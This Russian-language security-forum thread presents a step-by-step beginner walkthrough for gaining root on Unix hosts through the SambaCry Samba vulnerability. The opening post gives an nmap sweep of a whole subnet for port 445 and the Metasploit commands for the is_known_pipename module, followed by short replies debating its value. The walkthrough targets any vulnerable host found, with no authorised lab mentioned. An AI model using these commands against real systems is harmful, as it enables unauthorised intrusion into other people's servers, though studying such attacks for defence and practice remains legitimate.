• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Получаем права рута на UNIX системе

Z

ZZHup

Тема по получению прав рута через уязвимость SMB на Unix-подобной машине уже была, но уважаемый Vander как-то не до конца раскрыл тему, поэтому она трудна для новичков.
Распишу поподробней:
Запускаем nmap для поиска уязвимой цели:

nmap -sC -sS -sV -p 445 -O --open х.х.х.0/24

Найдя подходящую цель, запускаем Metasploit и используем эксплоит is_known_pipename.rb

> use exploit/linux/samba/is_known_pipename
> exploit(is_known_pipename) >

Устанавливаем адрес потенциальной жертвы

> set RHOST Х.Х.Х.Х

Смотрим настройки

>show option


Если все правильно, запускаем сплоит:

> run

Наслаждаемся победой:

 
T

Twix

То есть не эксплоит под цель а цель под эксплоит? Тогда это развлекуха а не изучение. Хотя это не относится к твоему труду по написанию статьи. Спасибо.
 
Z

ZZHup

То есть не эксплоит под цель а цель под эксплоит?
Любая цель ждет своего эксплоита, а любой эксплоит найдет свою цель.
Не понимая как одно соотносится с другим, не сможешь найти уязвимый хост и тем более применить эксплоит.

Тогда это развлекуха а не изучение.
Изучайте, развлекаясь!
Да не за, что. :)
 
S

sskfewke0

Так возможно получить права обычного пользователя. Зависит от атакуемого хоста.
[doublepost=1504122354,1504121975][/doublepost]Вот чувак получил обычные права
[doublepost=1504122529][/doublepost]Вообще судя по заголовку, тут должно быть поднятие привилегий до рута, а не sambacry
 
  • Нравится
Реакции: novikov433
N

novikov433

Так возможно получить права обычного пользователя. Зависит от атакуемого хоста.
[doublepost=1504122354,1504121975][/doublepost]Вот чувак получил обычные права
[doublepost=1504122529][/doublepost]Вообще судя по заголовку, тут должно быть поднятие привилегий до рута, а не sambacry
Побольше бы таких видосов! Ещё бы статью сделали - как понять какие эксплойты сразу дают Рут, а какие танцы с бубном. И ещё не оч ясно почему он для сканирования хоста не использует nessus
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!